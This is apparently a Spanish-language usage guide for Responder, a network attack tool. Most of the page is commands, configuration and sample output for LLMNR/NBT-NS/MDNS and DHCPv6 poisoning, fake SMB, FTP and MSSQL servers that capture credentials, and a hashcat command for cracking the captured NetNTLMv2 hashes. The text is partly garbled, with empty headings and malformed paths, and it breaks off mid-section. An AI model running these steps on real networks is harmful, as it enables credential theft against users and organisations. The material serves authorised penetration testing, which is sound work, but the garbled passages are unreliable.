
Responder es un envenenador de LLMNR, NBT-NS y MDNS, con un servidor de autenticación rogue incorporado para HTTP/SMB/MSSQL/FTP/LDAP que soporta NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP y autenticación HTTP Basic.
Responder es un envenenador de LLMNR, NBT-NS y MDNS con servidores de autenticación falsos incorporados para HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS y más. Soporta NTLMv1/NTLMv2/LMv2, NTLMSSP de seguridad extendida y varios métodos de autenticación en más de 15 protocolos.
Responder captura credenciales respondiendo a solicitudes de resolución de nombres LLMNR, NBT-NS y MDNS. Cuando un cliente intenta resolver un nombre de host inexistente, Responder responde, dirigiendo al cliente a la máquina del atacante donde múltiples servidores de autenticación falsos capturan las credenciales. También se incluyen servidores falsos DHCP y DHCPv6, que se pueden habilitar por separado.
Datos Capturados:
Esta versión incluye:
sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces
### Instalar Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt
sudo python3 Responder.py --help
---
## Inicio rápido
### Envenenamiento básico```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v
# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v
sudo python3 Responder.py -I eth0 --dhcpv6 -v
### Forzar autenticación básica HTTP```bash
sudo python3 Responder.py -I eth0 -b -v
sudo python3 Responder.py -I eth0 -Pvd
---
## Envenenamiento de red
### Envenenamiento LLMNR/NBT-NS/MDNS
**Propósito:** Responder a fallos de resolución de nombres
**Cómo funciona:**
1. El cliente difunde una consulta para un host inexistente
2. Responder responde: "Soy ese host"
3. El cliente se conecta al atacante
4. Credenciales capturadas
**Configuración:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On
Uso:```bash sudo python3 Responder.py -I eth0 -v
---
### Servidor DHCPv6
**Propósito:** Forzar a los clientes a usar el DNS del atacante a través de IPv6
**Características:**
- ✅ Soporte de INFORMATION-REQUEST (Windows 10/11)
- ✅ Soporte de SOLICIT/REQUEST
- ✅ Filtrado de dominios (segmentación quirúrgica)
- ✅ Router Advertisement (opcional)
**Cómo funciona:**
1. Windows envía INFORMATION-REQUEST, SOLICIT, REQUEST de DHCPv6
2. Responder responde: DNS = IPv6 del atacante
3. Windows prioriza el DNS IPv6
4. Todas las consultas DNS → atacante
5. Envenenamiento de DNS → captura de credenciales
**Configuración:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local
; Send Router Advertisements
SendRA = Off
; IPv6 address to advertise
BindToIPv6 = fe80::1
Uso:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v
**Salida esperada:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123
Responder incluye 17+ servidores de autenticación rogue:
Propósito: Capturar hashes NetNTLM de recursos compartidos de archivos
Características:
Disparadores:```powershell
\attacker-ip\share \non-existent-server\files
net use \attacker-ip\share
\attacker-ip\
**Formato Capturado:**```
username::domain:challenge:response:blob
Cracking:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt
**Configuración:**```ini
[Responder Core]
SMB = On
Propósito: Capturar credenciales FTP en texto claro
Características:
Disparadores:```bash ftp attacker-ip
**Formato capturado:**```
[FTP] Cleartext: username:password
Configuración:```ini [Responder Core] FTP = On
---
### Servidores de Bases de Datos
#### MSSQL Server (Puerto 1433)
**Propósito:** Capturar autenticación de Microsoft SQL Server
**Características:**
- ✅ Autenticación de SQL Server
- ✅ Autenticación de Windows (NTLM)
- ✅ Credenciales SQL en texto claro
- ✅ Captura de hash NetNTLMv2
**Desencadenantes:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows
-- Command line
sqlcmd -S attacker-ip -U sa -P password
-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;
Formatos capturados:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob
**Configuración:**```ini
[Responder Core]
SQL = On
Notas:
Propósito: Capturar autenticación de clientes de correo electrónico
Características: